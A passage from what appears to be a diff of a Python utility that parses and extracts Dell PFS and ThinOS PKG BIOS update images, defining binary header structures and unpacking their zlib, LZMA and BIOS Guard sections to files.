p, False) + printer(['Entry Version :', self.HeaderVersion], p, False) + printer(['Payload Version :', Version], p, False) + printer(['Reserved :', f'0x{self.Reserved:X}'], p, False) + printer(['Payload Data Size :', f'0x{self.DataSize:X}'], p, False) + printer(['Payload Signature Size :', f'0x{self.DataSigSize:X}'], p, False) + printer(['Metadata Data Size :', f'0x{self.DataMetSize:X}'], p, False) + printer(['Metadata Signature Size:', f'0x{self.DataMetSigSize:X}'], p, False) + printer(['Unknown :', f'0x{Unknown}'], p, False) + +# Dell PFS Entry Revision 1 Structure +class DellPfsEntryR1(DellPfsEntryBase): + _pack_ = 1 + _fields_ = [ + ('Unknown', uint32_t*4), # 0x38 + # 0x48 (child class, R1) + ] + +# Dell PFS Entry Revision 2 Structure +class DellPfsEntryR2(DellPfsEntryBase): + _pack_ = 1 + _fields_ = [ + ('Unknown', uint32_t*8), # 0x38 + # 0x58 (child class, R2) + ] + +# Dell PFS Information Header Structure +class DellPfsInfo(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('HeaderVersion', uint32_t), # 0x00 + ('GUID', uint32_t*4), # 0x04 Little Endian + # 0x14 + ] + + def struct_print(self, p): + GUID = f'{int.from_bytes(self.GUID, "little"):0{0x10 * 2}X}' + + printer(['Info Version:', self.HeaderVersion], p, False) + printer(['Entry GUID :', GUID], p, False) + +# Dell PFS FileName Header Structure +class DellPfsName(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Version', uint16_t*4), # 0x00 + ('VersionType', uint8_t*4), # 0x08 + ('CharacterCount', uint16_t), # 0x0C UTF-16 2-byte Characters + # 0x0E + ] + + def struct_print(self, p, name): + Version = get_entry_ver(self.Version, self.VersionType) + + printer(['Payload Version:', Version], p, False) + printer(['Character Count:', self.CharacterCount], p, False) + printer(['Payload Name :', name], p, False) + +# Dell PFS Metadata Header Structure +class DellPfsMetadata(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('ModelIDs', char*501), # 0x000 + ('FileName', char*100), # 0x1F5 + ('FileVersion', char*33), # 0x259 + ('Date', char*33), # 0x27A + ('Brand', char*80), # 0x29B + ('ModelFile', char*80), # 0x2EB + ('ModelName', char*100), # 0x33B + ('ModelVersion', char*33), # 0x39F + # 0x3C0 + ] + + def struct_print(self, p): + printer(['Model IDs :', self.ModelIDs.decode('utf-8').strip(',END')], p, False) + printer(['File Name :', self.FileName.decode('utf-8')], p, False) + printer(['File Version :', self.FileVersion.decode('utf-8')], p, False) + printer(['Date :', self.Date.decode('utf-8')], p, False) + printer(['Brand :', self.Brand.decode('utf-8')], p, False) + printer(['Model File :', self.ModelFile.decode('utf-8')], p, False) + printer(['Model Name :', self.ModelName.decode('utf-8')], p, False) + printer(['Model Version:', self.ModelVersion.decode('utf-8')], p, False) + +# Dell PFS BIOS Guard Metadata Structure +class DellPfsPfatMetadata(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Address', uint32_t), # 0x00 + ('Unknown0', uint32_t), # 0x04 + ('Offset', uint32_t), # 0x08 Matches BG Script > I0 + ('DataSize', uint32_t), # 0x0C Matches BG Script > I2 & Header > Data Size + ('Unknown1', uint32_t), # 0x10 + ('Unknown2', uint32_t), # 0x14 + ('Unknown3', uint8_t), # 0x18 + # 0x19 + ] + + def struct_print(self, p): + printer(['Address :', f'0x{self.Address:X}'], p, False) + printer(['Unknown 0:', f'0x{self.Unknown0:X}'], p, False) + printer(['Offset :', f'0x{self.Offset:X}'], p, False) + printer(['Length :', f'0x{self.DataSize:X}'], p, False) + printer(['Unknown 1:', f'0x{self.Unknown1:X}'], p, False) + printer(['Unknown 2:', f'0x{self.Unknown2:X}'], p, False) + printer(['Unknown 3:', f'0x{self.Unknown3:X}'], p, False) + +# The Dell ThinOS PKG update images usually contain multiple sections. +# Each section starts with a 0x30 header, which begins with pattern 72135500. +# The section length is found at 0x10-0x14 and its (optional) MD5 hash at 0x20-0x30. +# Section data can be raw or LZMA2 (7zXZ) compressed. The latter contains the PFS update image. +def is_pfs_pkg(input_file): + input_buffer = file_to_bytes(input_file) + + return PAT_DELL_PKG.search(input_buffer) + +# The Dell PFS update images usually contain multiple sections. +# Each section is zlib-compressed with header pattern ********++EEAA761BECBB20F1E651--789C, +# where ******** is the zlib stream size, ++ is the section type and -- the header Checksum XOR 8. +# The "Firmware" section has type AA and its files are stored in PFS format. +# The "Utility" section has type BB and its files are stored in PFS, BIN or 7z formats. +def is_pfs_hdr(input_file): + input_buffer = file_to_bytes(input_file) + + return bool(PAT_DELL_HDR.search(input_buffer)) + +# Each section is followed by the footer pattern ********EEAAEE8F491BE8AE143790--, +# where ******** is the zlib stream size and ++ the footer Checksum XOR 8. +def is_pfs_ftr(input_file): + input_buffer = file_to_bytes(input_file) + + return bool(PAT_DELL_FTR.search(input_buffer)) + +# Check if input is Dell PFS/PKG image +def is_dell_pfs(input_file): + input_buffer = file_to_bytes(input_file) + + is_pkg = is_pfs_pkg(input_buffer) + + is_hdr = is_pfs_hdr(input_buffer) + + is_ftr = is_pfs_ftr(input_buffer) + + return bool(is_pkg or is_hdr and is_ftr) + +# Parse & Extract Dell PFS Update image +def pfs_pkg_parse(input_file, extract_path, padding=0, structure=True, advanced=True): + input_buffer = file_to_bytes(input_file) + + make_dirs(extract_path, delete=True) + + is_dell_pkg = is_pfs_pkg(input_buffer) + + if is_dell_pkg: + pfs_results = thinos_pkg_extract(input_buffer, extract_path) + else: + pfs_results = {path_stem(input_file) if os.path.isfile(input_file) else 'Image': input_buffer} + + # Parse each Dell PFS image contained in the input file + for pfs_index,(pfs_name,pfs_buffer) in enumerate(pfs_results.items(), start=1): + # At ThinOS PKG packages, multiple PFS images may be included in separate model-named folders + pfs_path = os.path.join(extract_path, f'{pfs_index} {pfs_name}') if is_dell_pkg else extract_path + # Parse each PFS ZLIB section + for zlib_offset in get_section_offsets(pfs_buffer): + # Call the PFS ZLIB section parser function + pfs_section_parse(pfs_buffer, zlib_offset, pfs_path, pfs_name, pfs_index, 1, False, padding, structure, advanced) + +# Extract Dell ThinOS PKG 7zXZ +def thinos_pkg_extract(input_file, extract_path): + input_buffer = file_to_bytes(input_file) + + # Initialize PFS results (Name: Buffer) + pfs_results = {} + + # Search input image for ThinOS PKG 7zXZ header + thinos_pkg_match = PAT_DELL_PKG.search(input_buffer) + + lzma_len_off = thinos_pkg_match.start() + 0x10 + lzma_len_int = int.from_bytes(input_buffer[lzma_len_off:lzma_len_off + 0x4], 'little') + lzma_bin_off = thinos_pkg_match.end() - 0x5 + lzma_bin_dat = input_buffer[lzma_bin_off:lzma_bin_off + lzma_len_int] + + # Check if the compressed 7zXZ stream is complete + if len(lzma_bin_dat) != lzma_len_int: + return pfs_results + + working_path = os.path.join(extract_path, 'THINOS_PKG_TEMP') + + make_dirs(working_path, delete=True) + + pkg_tar_path = os.path.join(working_path, 'THINOS_PKG.TAR') + + with open(pkg_tar_path, 'wb') as pkg_payload: + pkg_payload.write(lzma.decompress(lzma_bin_dat)) + + if is_szip_supported(pkg_tar_path, 0, args=['-tTAR'], check=True, silent=True): + if szip_decompress(pkg_tar_path, working_path, 'TAR', 0, args=['-tTAR'], check=True, silent=True) == 0: + os.remove(pkg_tar_path) + else: + return pfs_results + else: + return pfs_results + + for pkg_file in get_path_files(working_path): + if is_pfs_hdr(pkg_file): + pfs_name = path_name(path_parent(pkg_file)) + pfs_results.update({pfs_name: file_to_bytes(pkg_file)}) + + del_dirs(working_path) + + return pfs_results + +# Get PFS ZLIB Section Offsets +def get_section_offsets(buffer): + pfs_zlib_list = [] # Initialize PFS ZLIB offset list + + pfs_zlib_init = list(PAT_DELL_HDR.finditer(buffer)) + + if not pfs_zlib_init: + return pfs_zlib_list # No PFS ZLIB detected + + # Remove duplicate/nested PFS ZLIB offsets + for zlib_c in pfs_zlib_init: + is_duplicate = False # Initialize duplicate/nested PFS ZLIB offset + + for zlib_o in pfs_zlib_init: + zlib_o_size = int.from_bytes(buffer[zlib_o.start() - 0x5:zlib_o.start() - 0x1], 'little') + + # If current PFS ZLIB offset is within another PFS ZLIB range (start-end), set as duplicate + if zlib_o.start() < zlib_c.start() < zlib_o.start() + zlib_o_size: + is_duplicate = True + + if not is_duplicate: + pfs_zlib_list.append(zlib_c.start()) + + return pfs_zlib_list + +# Dell PFS ZLIB Section Parser +def pfs_section_parse(zlib_data, zlib_start, extract_path, pfs_name, pfs_index, pfs_count, is_rec, padding=0, structure=True, advanced=True): + is_zlib_error = False # Initialize PFS ZLIB-related error state + + section_type = zlib_data[zlib_start - 0x1] # Byte before PFS ZLIB Section pattern is Section Type (e.g. AA, BB) + section_name = {0xAA:'Firmware', 0xBB:'Utilities'}.get(section_type, f'Unknown ({section_type:02X})') + + # Show extraction complete message for each main PFS ZLIB Section + printer(f'Extracting Dell PFS {pfs_index} > {pfs_name} > {section_name}', padding) + + # Set PFS ZLIB Section extraction sub-directory path + section_path = os.path.join(extract_path, safe_name(section_name)) + + # Create extraction sub-directory and delete old (if present, not in recursions) + make_dirs(section_path, delete=(not is_rec), parents=True, exist_ok=True) + + # Store the compressed zlib stream start offset + compressed_start = zlib_start + 0xB + + # Store the PFS ZLIB section header start offset + header_start = zlib_start - 0x5 + + # Store the PFS ZLIB section header contents (16 bytes) + header_data = zlib_data[header_start:compressed_start] + + # Check if the PFS ZLIB section header Checksum XOR 8 is valid + if get_chk_8_xor(header_data[:0xF]) != header_data[0xF]: + printer('Error: Invalid Dell PFS ZLIB section Header Checksum!', padding) + is_zlib_error = True + + # Store the compressed zlib stream size from the header contents + compressed_size_hdr = int.from_bytes(header_data[:0x4], 'little') + + # Store the compressed zlib stream end offset + compressed_end = compressed_start + compressed_size_hdr + + # Store the compressed zlib stream contents + compressed_data = zlib_data[compressed_start:compressed_end] + + # Check if the compressed zlib stream is complete, based on header + if len(compressed_data) != compressed_size_hdr: + printer('Error: Incomplete Dell PFS ZLIB section data (Header)!', padding) + is_zlib_error = True + + # Store the PFS ZLIB section footer contents (16 bytes) + footer_data = zlib_data[compressed_end:compressed_end + 0x10] + + # Check if PFS ZLIB section footer was found in the section + if not is_pfs_ftr(footer_data): + printer('Error: This Dell PFS ZLIB section is corrupted!', padding) + is_zlib_error = True + + # Check if the PFS ZLIB section footer Checksum XOR 8 is valid + if get_chk_8_xor(footer_data[:0xF]) != footer_data[0xF]: + printer('Error: Invalid Dell PFS ZLIB section Footer Checksum!', padding) + is_zlib_error = True + + # Store the compressed zlib stream size from the footer contents + compressed_size_ftr = int.from_bytes(footer_data[:0x4], 'little') + + # Check if the compressed zlib stream is complete, based on footer + if compressed_size_ftr != compressed_size_hdr: + printer('Error: Incomplete Dell PFS ZLIB section data (Footer)!', padding) + is_zlib_error = True + + # Decompress PFS ZLIB section payload + try: + if is_zlib_error: + raise Exception('ZLIB_ERROR') # ZLIB errors are critical + section_data = zlib.decompress(compressed_data) # ZLIB decompression + except Exception: + section_data = zlib_data # Fallback to raw ZLIB data upon critical error + + # Call the PFS Extract function on the decompressed PFS ZLIB Section + pfs_extract(section_data, pfs_index, pfs_name, pfs_count, section_path, padding, structure, advanced) + +# Parse & Extract Dell PFS Volume +def pfs_extract(buffer, pfs_index, pfs_name, pfs_count, extract_path, padding=0, structure=True, advanced=True): + # Show PFS Volume indicator + if structure: + printer('PFS Volume:', padding) + + # Get PFS Header Structure values + pfs_hdr = get_struct(buffer, 0, DellPfsHeader) + + # Validate that a PFS Header was parsed + if pfs_hdr.Tag != b'PFS.HDR.': + printer('Error: PFS Header could not be found!', padding + 4) + + return # Critical error, abort + + # Show PFS Header Structure info + if structure: + printer('PFS Header:\n', padding + 4) + pfs_hdr.struct_print(padding + 8) + + # Validate that a known PFS Header Version was encountered + chk_hdr_ver(pfs_hdr.HeaderVersion, 'PFS', padding + 8) + + # Get PFS Payload Data + pfs_payload = buffer[PFS_HEAD_LEN:PFS_HEAD_LEN + pfs_hdr.PayloadSize] + + # Parse all PFS Payload Entries/Components + entry_index = 1 # Index number of each PFS Entry + entry_start = 0 # Increasing PFS Entry starting offset + entries_all = [] # Storage for each PFS Entry details + filename_info = [] # Buffer for FileName Information Entry Data + signature_info = [] # Buffer for Signature Information Entry Data + pfs_entry_struct,pfs_entry_size = get_pfs_entry(pfs_payload, entry_start) # Get PFS Entry Info + while len(pfs_payload[entry_start:entry_start + pfs_entry_size]) == pfs_entry_size: + # Analyze PFS Entry Structure and get relevant info + _,entry_version,entry_guid,entry_data,entry_data_sig,entry_met,entry_met_sig,next_entry = \ + parse_pfs_entry(pfs_payload, entry_start, pfs_entry_size, pfs_entry_struct, 'PFS Entry', padding, structure) + + entry_type = 'OTHER' # Adjusted later if PFS Entry is Zlib, PFAT, PFS Info, Model Info + + # Get PFS Information from the PFS Entry with GUID E0717CE3A9BB25824B9F0DC8FD041960 or B033CB16EC9B45A14055F80E4D583FD3 + if entry_guid in ['E0717CE3A9BB25824B9F0DC8FD041960','B033CB16EC9B45A14055F80E4D583FD3']: + filename_info = entry_data + entry_type = 'NAME_INFO' + + # Get Model Information from the PFS Entry with GUID 6F1D619A22A6CB924FD4DA68233AE3FB + elif entry_guid == '6F1D619A22A6CB924FD4DA68233AE3FB': + entry_type = 'MODEL_INFO' + + # Get Signature Information from the PFS Entry with GUID D086AFEE3ADBAEA94D5CED583C880BB7 + elif entry_guid == 'D086AFEE3ADBAEA94D5CED583C880BB7': + signature_info = entry_data + entry_type = 'SIG_INFO' + + # Get Nested PFS from the PFS Entry with GUID 900FAE60437F3AB14055F456AC9FDA84 + elif entry_guid == '900FAE60437F3AB14055F456AC9FDA84': + entry_type = 'NESTED_PFS' # Nested PFS are usually zlib-compressed so it might change to 'ZLIB' later + + # Store all relevant PFS Entry details + entries_all.append([entry_index, entry_guid, entry_version, entry_type, entry_data, entry_data_sig, entry_met, entry_met_sig]) + + entry_index += 1 # Increase PFS Entry Index number for user-friendly output and name duplicates + entry_start = next_entry # Next PFS Entry starts after PFS Entry Metadata Signature + + # Parse all PFS Information Entries/Descriptors + info_start = 0 # Increasing PFS Information Entry starting offset + info_all = [] # Storage for each PFS Information Entry details + while len(filename_info[info_start:info_start + PFS_INFO_LEN]) == PFS_INFO_LEN: + # Get PFS Information Header Structure info + entry_info_hdr = get_struct(filename_info, info_start, DellPfsInfo) + + # Show PFS Information Header Structure info + if structure: + printer('PFS Information Header:\n', padding + 4) + entry_info_hdr.struct_print(padding + 8) + + # Validate that a known PFS Information Header Version was encountered + if entry_info_hdr.HeaderVersion != 1: + printer(f'Error: Unknown PFS Information Header Version {entry_info_hdr.HeaderVersion}!', padding + 8) + break # Skip PFS Information Entries/Descriptors in case of unknown PFS Information Header Version + + # Get PFS Information Header GUID in Big Endian format to match each Info to the equivalent stored PFS Entry details + entry_guid = f'{int.from_bytes(entry_info_hdr.GUID, "little"):0{0x10 * 2}X}' + + # Get PFS FileName Structure values + entry_info_mod = get_struct(filename_info, info_start + PFS_INFO_LEN, DellPfsName) + + # The PFS FileName Structure is not complete by itself. The size of the last field (Entry Name) is determined from + # CharacterCount multiplied by 2 due to usage of UTF-16 2-byte Characters. Any Entry Name leading and/or trailing + # space/null characters are stripped and common Windows reserved/illegal filename characters are replaced + name_start = info_start + PFS_INFO_LEN + PFS_NAME_LEN # PFS Entry's FileName start offset + name_size = entry_info_mod.CharacterCount * 2 # PFS Entry's FileName buffer total size + name_data = filename_info[name_start:name_start + name_size] # PFS Entry's FileName buffer + entry_name = safe_name(name_data.decode('utf-16').strip()) # PFS Entry's FileName value + + # Show PFS FileName Structure info + if structure: + printer('PFS FileName Entry:\n', padding + 8) + entry_info_mod.struct_print(padding + 12, entry_name) + + # Get PFS FileName Version string via "Version" and "VersionType" fields + # PFS FileName Version string must be preferred over PFS Entry's Version + entry_version = get_entry_ver(entry_info_mod.Version, entry_info_mod.VersionType) + + # Store all relevant PFS FileName details + info_all.append([entry_guid, entry_name, entry_version]) + + # The next PFS Information Header starts after the calculated FileName size + # Two space/null characters seem to always exist after each FileName value + info_start += (PFS_INFO_LEN + PFS_NAME_LEN + name_size + 0x2) + + # Parse Nested PFS Metadata when its PFS Information Entry is missing + for index in range(len(entries_all)): + if entries_all[index][3] == 'NESTED_PFS' and not filename_info: + entry_guid = entries_all[index][1] # Nested PFS Entry GUID in Big Endian format + entry_metadata = entries_all[index][6] # Use Metadata as PFS Information Entry + + # When PFS Information Entry exists, Nested PFS Metadata contains only Model IDs + # When it's missing, the Metadata structure is large and contains equivalent info + if len(entry_metadata) >= PFS_META_LEN: + # Get Nested PFS Metadata Structure values + entry_info = get_struct(entry_metadata, 0, DellPfsMetadata) + + # Show Nested PFS Metadata Structure info + if structure: + printer('PFS Metadata Information:\n', padding + 4) + entry_info.struct_print(padding + 8) + + # As Nested PFS Entry Name, we'll use the actual PFS File Name + # Replace common Windows reserved/illegal filename characters + entry_name = safe_name(entry_info.FileName.decode('utf-8').strip('.exe')) + + # As Nested PFS Entry Version, we'll use the actual PFS File Version + entry_version = entry_info.FileVersion.decode('utf-8') + + # Store all relevant Nested PFS Metadata/Information details + info_all.append([entry_guid, entry_name, entry_version]) + + # Re-set Nested PFS Entry Version from Metadata + entries_all[index][2] = entry_version + + # Parse all PFS Signature Entries/Descriptors + sign_start = 0 # Increasing PFS Signature Entry starting offset + while len(signature_info[sign_start:sign_start + PFS_INFO_LEN]) == PFS_INFO_LEN: + # Get PFS Information Header Structure info + entry_info_hdr = get_struct(signature_info, sign_start, DellPfsInfo) + + # Show PFS Information Header Structure info + if structure: + printer('PFS Information Header:\n', padding + 4) + entry_info_hdr.struct_print(padding + 8) + + # Validate that a known PFS Information Header Version was encountered + if entry_info_hdr.HeaderVersion != 1: + printer(f'Error: Unknown PFS Information Header Version {entry_info_hdr.HeaderVersion}!', padding + 8) + break # Skip PFS Signature Entries/Descriptors in case of unknown Header Version + + # PFS Signature Entries/Descriptors have DellPfsInfo + DellPfsEntryR* + Sign Size [0x2] + Sign Data [Sig Size] + pfs_entry_struct, pfs_entry_size = get_pfs_entry(signature_info, sign_start + PFS_INFO_LEN) # Get PFS Entry Info + + # Get PFS Entry Header Structure info + entry_hdr = get_struct(signature_info, sign_start + PFS_INFO_LEN, pfs_entry_struct) + + # Show PFS Information Header Structure info + if structure: + printer('PFS Information Entry:\n', padding + 8) + entry_hdr.struct_print(padding + 12) + + # Show PFS Signature Size & Data (after DellPfsEntryR*) + sign_info_start = sign_start + PFS_INFO_LEN + pfs_entry_size + sign_size = int.from_bytes(signature_info[sign_info_start:sign_info_start + 0x2], 'little') + sign_data_raw = signature_info[sign_info_start + 0x2:sign_info_start + 0x2 + sign_size] + sign_data_txt = f'{int.from_bytes(sign_data_raw, "little"):0{sign_size * 2}X}' + + if structure: + printer('Signature Information:\n', padding + 8) + printer(f'Signature Size: 0x{sign_size:X}', padding + 12, False) + printer(f'Signature Data: {sign_data_txt[:32]} [...]', padding + 12, False) + + # The next PFS Signature Entry/Descriptor starts after the previous Signature Data + sign_start += (PFS_INFO_LEN + pfs_entry_size + 0x2 + sign_size) + + # Parse each PFS Entry Data for special types (zlib or PFAT) + for index in range(len(entries_all)): + entry_data = entries_all[index][4] # Get PFS Entry Data + entry_type = entries_all[index][3] # Get PFS Entry Type + + # Very small PFS Entry Data cannot be of special type + if len(entry_data) < PFS_HEAD_LEN: + continue + + # Check if PFS Entry contains zlib-compressed sub-PFS Volume + pfs_zlib_offsets = get_section_offsets(entry_data) + + # Check if PFS Entry contains sub-PFS Volume with PFAT Payload + is_pfat = False # Initial PFAT state for sub-PFS Entry + _, pfat_entry_size = get_pfs_entry(entry_data, PFS_HEAD_LEN) # Get possible PFS PFAT Entry Size + pfat_hdr_off = PFS_HEAD_LEN + pfat_entry_size # Possible PFAT Header starts after PFS Header & Entry + pfat_entry_hdr = get_struct(entry_data, 0, DellPfsHeader) # Possible PFS PFAT Entry + if len(entry_data) - pfat_hdr_off >= PFAT_HDR_LEN: + pfat_hdr = get_struct(entry_data, pfat_hdr_off, IntelBiosGuardHeader) + is_pfat = pfat_hdr.get_platform_id().upper().startswith('DELL') + + # Parse PFS Entry which contains sub-PFS Volume with PFAT Payload + if pfat_entry_hdr.Tag == b'PFS.HDR.' and is_pfat: + entry_type = 'PFAT' # Re-set PFS Entry Type from OTHER to PFAT, to use such info afterwards + + entry_data = parse_pfat_pfs(pfat_entry_hdr, entry_data, padding, structure) # Parse sub-PFS PFAT Volume + + # Parse PFS Entry which contains zlib-compressed sub-PFS Volume + elif pfs_zlib_offsets: + entry_type = 'ZLIB' # Re-set PFS Entry Type from OTHER to ZLIB, to use such info afterwards + pfs_count += 1 # Increase the count/index of parsed main PFS structures by one + + # Parse each sub-PFS ZLIB Section + for offset in pfs_zlib_offsets: + # Get the Name of the zlib-compressed full PFS structure via the already stored PFS Information + # The zlib-compressed full PFS structure(s) are used to contain multiple FW (CombineBiosNameX) + # When zlib-compressed full PFS structure(s) exist within the main/first full PFS structure, + # its PFS Information should contain their names (CombineBiosNameX). Since the main/first + # full PFS structure has count/index 1, the rest start at 2+ and thus, their PFS Information + # names can be retrieved in order by subtracting 2 from the main/first PFS Information values + sub_pfs_name = f'{info_all[pfs_count - 2][1]} v{info_all[pfs_count - 2][2]}' if info_all else ' UNKNOWN' + + # Set the sub-PFS output path (create sub-folders for each sub-PFS and its ZLIB sections) + sub_pfs_path = os.path.join(extract_path, f'{pfs_count} {safe_name(sub_pfs_name)}') + + # Recursively call the PFS ZLIB Section Parser function for the sub-PFS Volume (pfs_index = pfs_count) + pfs_section_parse(entry_data, offset, sub_pfs_path, sub_pfs_name, pfs_count, pfs_count, True, padding + 4, structure, advanced) + + entries_all[index][4] = entry_data # Adjust PFS Entry Data after parsing PFAT (same ZLIB raw data, not stored afterwards) + entries_all[index][3] = entry_type # Adjust PFS Entry Type from OTHER to PFAT or ZLIB (ZLIB is ignored at file extraction) + + # Name & Store each PFS Entry/Component Data, Data Signature, Metadata, Metadata Signature + for entry_index in range(len(entries_all)): + file_index = entries_all[entry_index][0] + file_guid = entries_all[entry_index][1] + file_version = entries_all[entry_index][2] + file_type = entries_all[entry_index][3] + file_data = entries_all[entry_index][4] + file_data_sig = entries_all[entry_index][5] + file_meta = entries_all[entry_index][6] + file_meta_sig = entries_all[entry_index][7] + + # Give Names to special PFS Entries, not covered by PFS Information + if file_type == 'MODEL_INFO': + file_name = 'Model Information' + elif file_type == 'NAME_INFO': + file_name = 'Filename Information' + if not advanced: + continue # Don't store Filename Information in non-advanced user mode + elif file_type == 'SIG_INFO': + file_name = 'Signature Information' + if not advanced: + continue # Don't store Signature Information in non-advanced user mode + else: + file_name = '' + + # Most PFS Entry Names & Versions are found at PFS Information via their GUID + # Version can be found at DellPfsEntryR* but prefer PFS Information when possible + for info_index in range(len(info_all)): + info_guid = info_all[info_index][0] + info_name = info_all[info_index][1] + info_version = info_all[info_index][2] + + # Give proper Name & Version info if Entry/Information GUIDs match + if info_guid == file_guid: + file_name = info_name + file_version = info_version + + info_all[info_index][0] = 'USED' # PFS with zlib-compressed sub-PFS use the same GUID + + break # Break at 1st Name match to not rename again from next zlib-compressed sub-PFS with the same GUID + + # For both advanced & non-advanced users, the goal is to store final/usable files only + # so empty or intermediate files such as sub-PFS, PFS w/ PFAT or zlib-PFS are skipped + # Main/First PFS CombineBiosNameX Metadata files must be kept for accurate Model Information + # All users should check these files in order to choose the correct CombineBiosNameX modules + write_files = [] # Initialize list of output PFS Entry files to be written/extracted + + is_zlib = bool(file_type == 'ZLIB') # Determine if PFS Entry Data was zlib-compressed + + if file_data and not is_zlib: + write_files.append([file_data, 'data']) # PFS Entry Data Payload + + if file_data_sig and advanced: + write_files.append([file_data_sig, 'sign_data']) # PFS Entry Data Signature + + if file_meta and (is_zlib or advanced): + write_files.append([file_meta, 'meta']) # PFS Entry Metadata Payload + + if file_meta_sig and advanced: + write_files.append([file_meta_sig, 'sign_meta']) # PFS Entry Metadata Signature + + # Write/Extract PFS Entry files + for file in write_files: + full_name = f'{pfs_index} {pfs_name} -- {file_index} {file_name} v{file_version}' # Full PFS Entry Name + pfs_file_write(file[0], file[1], file_type, full_name, extract_path, padding, structure, advanced) + + # Get PFS Footer Data after PFS Header Payload + pfs_footer = buffer[PFS_HEAD_LEN + pfs_hdr.PayloadSize:PFS_HEAD_LEN + pfs_hdr.PayloadSize + PFS_FOOT_LEN] + + # Analyze PFS Footer Structure + chk_pfs_ftr(pfs_footer, pfs_payload, pfs_hdr.PayloadSize, 'PFS', padding, structure) + +# Analyze Dell PFS Entry Structure +def parse_pfs_entry(entry_buffer, entry_start, entry_size, entry_struct, text, padding=0, structure=True): + # Get PFS Entry Structure values + pfs_entry = get_struct(entry_buffer, entry_start, entry_struct) + + # Show PFS Entry Structure info + if structure: + printer('PFS Entry:\n', padding + 4) + pfs_entry.struct_print(padding + 8) + + # Validate that a known PFS Entry Header Version was encountered + chk_hdr_ver(pfs_entry.HeaderVersion, text, padding + 8) + + # Validate that the PFS Entry Reserved field is empty + if pfs_entry.Reserved != 0: + printer(f'Error: Detected non-empty {text} Reserved field!', padding + 8) + + # Get PFS Entry Version string via "Version" and "VersionType" fields + entry_version = get_entry_ver(pfs_entry.Version, pfs_entry.VersionType) + + # Get PFS Entry GUID in Big Endian format + entry_guid = f'{int.from_bytes(pfs_entry.GUID, "little"):0{0x10 * 2}X}' + + # PFS Entry Data starts after the PFS Entry Structure + entry_data_start = entry_start + entry_size + entry_data_end = entry_data_start + pfs_entry.DataSize + + # PFS Entry Data Signature starts after PFS Entry Data + entry_data_sig_start = entry_data_end + entry_data_sig_end = entry_data_sig_start + pfs_entry.DataSigSize + + # PFS Entry Metadata starts after PFS Entry Data Signature + entry_met_start = entry_data_sig_end + entry_met_end = entry_met_start + pfs_entry.DataMetSize + + # PFS Entry Metadata Signature starts after PFS Entry Metadata + entry_met_sig_start = entry_met_end + entry_met_sig_end = entry_met_sig_start + pfs_entry.DataMetSigSize + + entry_data = entry_buffer[entry_data_start:entry_data_end] # Store PFS Entry Data + entry_data_sig = entry_buffer[entry_data_sig_start:entry_data_sig_end] # Store PFS Entry Data Signature + entry_met = entry_buffer[entry_met_start:entry_met_end] # Store PFS Entry Metadata + entry_met_sig = entry_buffer[entry_met_sig_start:entry_met_sig_end] # Store PFS Entry Metadata Signature + + return pfs_entry, entry_version, entry_guid, entry_data, entry_data_sig, entry_met, entry_met_sig, entry_met_sig_end + +# Parse Dell PFS Volume with PFAT Payload +def parse_pfat_pfs(entry_hdr, entry_data, padding=0, structure=True): + # Show PFS Volume indicator + if structure: + printer('PFS Volume:', padding + 4) + + # Show sub-PFS Header Structure Info + if structure: + printer('PFS Header:\n', padding + 8) + entry_hdr.struct_print(padding + 12) + + # Validate that a known sub-PFS Header Version was encountered + chk_hdr_ver(entry_hdr.HeaderVersion, 'sub-PFS', padding + 12) + + # Get sub-PFS Payload Data + pfat_payload = entry_data[PFS_HEAD_LEN:PFS_HEAD_LEN + entry_hdr.PayloadSize] + + # Get sub-PFS Footer Data after sub-PFS Header Payload (must be retrieved at the initial entry_data, before PFAT parsing) + pfat_footer = entry_data[PFS_HEAD_LEN + entry_hdr.PayloadSize:PFS_HEAD_LEN + entry_hdr.PayloadSize + PFS_FOOT_LEN] + + # Parse all sub-PFS Payload PFAT Entries + pfat_entries_all = [] # Storage for all sub-PFS PFAT Entries Order/Offset & Payload/Raw Data + pfat_entry_start = 0 # Increasing sub-PFS PFAT Entry start offset + pfat_entry_index = 1 # Increasing sub-PFS PFAT Entry count index + _, pfs_entry_size = get_pfs_entry(pfat_payload, 0) # Get initial PFS PFAT Entry Size for loop + while len(pfat_payload[pfat_entry_start:pfat_entry_start + pfs_entry_size]) == pfs_entry_size: + # Get sub-PFS PFAT Entry Structure & Size info + pfat_entry_struct,pfat_entry_size = get_pfs_entry(pfat_payload, pfat_entry_start) + + # Analyze sub-PFS PFAT Entry Structure and get relevant info + pfat_entry,_,_,pfat_entry_data,_,pfat_entry_met,_,pfat_next_entry = parse_pfs_entry(pfat_payload, + pfat_entry_start, pfat_entry_size, pfat_entry_struct, 'sub-PFS PFAT Entry', padding + 4, structure) + + # Each sub-PFS PFAT Entry includes an AMI BIOS Guard (a.k.a. PFAT) block at the beginning + # We need to parse the PFAT block and remove its contents from the final Payload/Raw Data + pfat_hdr_off = pfat_entry_start + pfat_entry_size # PFAT block starts after PFS Entry + + # Get sub-PFS PFAT Header Structure values + pfat_hdr = get_struct(pfat_payload, pfat_hdr_off, IntelBiosGuardHeader) + + # Get ordinal value of the sub-PFS PFAT Entry Index + pfat_entry_idx_ord = get_ordinal(pfat_entry_index) + + # Show sub-PFS PFAT Header Structure info + if structure: + printer(f'PFAT Block {pfat_entry_idx_ord} - Header:\n', padding + 12) + pfat_hdr.struct_print(padding + 16) + + pfat_script_start = pfat_hdr_off + PFAT_HDR_LEN # PFAT Block Script Start + pfat_script_end = pfat_script_start + pfat_hdr.ScriptSize # PFAT Block Script End + pfat_script_data = pfat_payload[pfat_script_start:pfat_script_end] # PFAT Block Script Data + pfat_payload_start = pfat_script_end # PFAT Block Payload Start (at Script end) + pfat_payload_end = pfat_script_end + pfat_hdr.DataSize # PFAT Block Data End + pfat_payload_data = pfat_payload[pfat_payload_start:pfat_payload_end] # PFAT Block Raw Data + pfat_hdr_bgs_size = PFAT_HDR_LEN + pfat_hdr.ScriptSize # PFAT Block Header & Script Size + + # The PFAT Script End should match the total Entry Data Size w/o PFAT block + if pfat_hdr_bgs_size != pfat_entry.DataSize - pfat_hdr.DataSize: + printer(f'Error: Detected sub-PFS PFAT Block {pfat_entry_idx_ord} Header & PFAT Size mismatch!', padding + 16) + + # Get PFAT Header Flags (SFAM, ProtectEC, GFXMitDis, FTU, Reserved) + 